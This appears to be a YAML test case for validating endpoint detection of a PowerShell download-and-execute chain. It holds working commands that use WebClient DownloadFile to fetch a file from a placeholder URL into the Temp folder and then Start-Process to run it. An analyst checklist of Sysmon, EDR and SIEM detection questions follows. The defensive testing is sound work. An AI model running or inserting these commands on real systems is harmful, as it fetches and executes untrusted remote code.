id: DLEXEC_002_powershell_downloadfile
name: "Download and Execute — PowerShell DownloadFile to Disk"
mitre: "T1059.001, T1105"
category: download_execute
description: >
  Downloads a file from a remote URL and saves it to disk using Net.WebClient
  DownloadFile, then executes it. Unlike IEX, this method writes the payload to
  disk first — tests both network download telemetry and file drop detection.
  Replace PLACEHOLDER_URL and PLACEHOLDER_FILENAME accordingly.

requirements:
  os: windows
  admin: false

steps:
  - type: marker
    message: "[DLEXEC-002] PowerShell DownloadFile to disk"

  - type: exec_powershell
    encoded: false
    command: |
      (New-Object System.Net.WebClient).DownloadFile("PLACEHOLDER_URL", "C:\Windows\Temp\PLACEHOLDER_FILENAME")
    timeout_seconds: 30

  - type: sleep
    seconds: 15

  - type: exec_powershell
    encoded: false
    command: |
      Start-Process "C:\Windows\Temp\PLACEHOLDER_FILENAME"
    timeout_seconds: 15

  - type: sleep
    seconds: 30

  - type: marker
    message: "[DLEXEC-002] Cleanup"

  - type: file_delete
    path: "C:\\Windows\\Temp\\PLACEHOLDER_FILENAME"

analyst_checklist:
  - "Sysmon Event ID 3: Network connection from powershell.exe to download host?"
  - "Sysmon Event ID 11: File created in C:\\Windows\\Temp — captured with hash?"
  - "EDR: Alert on file dropped to Temp by PowerShell then executed?"
  - "EDR: Hash of downloaded file captured — can you query it across fleet?"
  - "EDR: Start-Process spawning the downloaded file — parent/child tree intact?"
  - "SIEM: File drop + execution chain correlatable in same session?"
  - "Rule opportunity: powershell.exe writing executable to C:\\Windows\\Temp then spawning it"
  - "Rule opportunity: process create where parent=powershell.exe and image path is in Temp"
